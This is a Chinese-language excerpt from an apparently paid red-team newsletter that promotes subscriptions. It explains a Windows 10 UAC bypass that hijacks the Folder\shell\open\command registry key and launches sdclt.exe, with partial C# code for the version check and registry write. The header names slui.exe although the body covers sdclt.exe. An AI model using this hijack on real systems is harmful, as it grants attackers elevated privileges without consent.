01
阅读须知
此文所节选自小报童《.NET 内网实战攻防》专栏,主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,对内网和后渗透感兴趣的朋友们可以订阅该电子报刊,解锁更多的报刊内容。
02
基本介绍
本文内容部分节选自小报童《.NET 通过 slui.exe 绕过 UAC 实现提权》,完整的文章内容请加入小报童后订阅查看。现在限时只需59元,永久买断!目前已有300+位朋友抢先预定,我们会长期更新,对.NET内网安全的朋友们请尽快订阅该报刊!
03
原理分析
在 Windows 内网渗透或红队演练中,绕过 UAC 是攻击者常用的提权手法之一。虽然 Windows 设计 UAC 机制来限制恶意软件执行高权限操作,但某些系统组件由于历史遗留问题,可以在 不触发 UAC 提示 的情况下 继承高权限执行代码。
3.1 sdclt.exe
其中,sdclt.exe 作为 Windows 备份与恢复功能的一部分,因其调用 Windows Shell 处理 Foldershellopencommand 注册表项的行为,成为了 UAC 绕过的关键点。本文将深入分析 sdclt.exe 如何与注册表劫持技术结合,实现 无提示 UAC 提权,并探讨其适用环境、防御措施及修复情况。
常见用法:在 运行(Win + R) 中输入 sdclt.exe ,或者运行命令参数
sdclt.exe /BLBBACKUPWIZARD
3.2 编码实现
首先,访问 HKLMSoftwareMicrosoftWindows NTCurrentVersionProductName 获取 Windows 版本信息。用于 检查操作系统版本,确保目标系统是 Windows 10,否则退出程序,具体代码如下所示。
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows NT\CurrentVersion\");string text = registryKey.GetValue("ProductName").ToString();registryKey.Close();if(!text.Contains("Windows 10")){ Console.WriteLine("System is not Windows 10. This attack will fail. Exiting..."); Environment.Exit(1);}
随后,攻击者通过创建 注册表项和设置默认值来触发恶意命令的执行,具体代码如下所示。
string command = Encoding.UTF8.GetString(encodedCommand);RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\Classes\",true);registryKey2.CreateSubKey("Folder\shell\open\command");RegistryKey registryKey3 = Registry.CurrentUser.OpenSubKey("Software\Classes\Folder\shell\open\command",true);registryKey3.SetValue("", command);registryKey3.SetValue("DelegateExecute","");registryKey3.Close();
设置 DelegateExecute 为 "",该值为空时,系统会在 UAC 白名单内直接执行该命令。 最后, 运行 sdclt.exe,Windows 认为该程序属于 受信任的系统组件,在 无 UAC 提示 的情况下执行 Foldershellopencommand 里的内容。
04
欢迎加入.NET 电子报刊
我们的小报童电子报刊【.NET内网安全攻防】也开始运营,引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足,为用户读者提供更佳的阅读体验。如果您对阅读体验的需求比较高,那么可以订阅这个专栏。
本次电子报刊《.NET 内网安全攻防》专栏,内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,可细分为以下8个方向。
1) .NET 安全防御绕过2) .NET 本地权限提升3) .NET 内网信息收集4) .NET 内网代理通道5) .NET 内网横向移动6) .NET 目标权限维持7) .NET 数据传输外发8) .NET 目标痕迹清理
原价899,现在限时只需59元,永久买断!目前已有280+位朋友抢先预定,我们会长期更新,初步计划保持每周更新1-2篇新内容,对.NET内网安全的朋友们请尽快订阅该报刊!
每增加五十人涨价10元,抓紧订阅,超值!订阅后请关注公众号:dotNet安全矩阵,发送订单截图和您的微信号,邀请您加入专属交流群。感兴趣的朋友,可以点击链接:https://xiaobot.net/p/dotNetAttack,或者扫描下方海报微信二维码加入即可,订阅后小报童定时会将最新内容通过微信推送给您。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...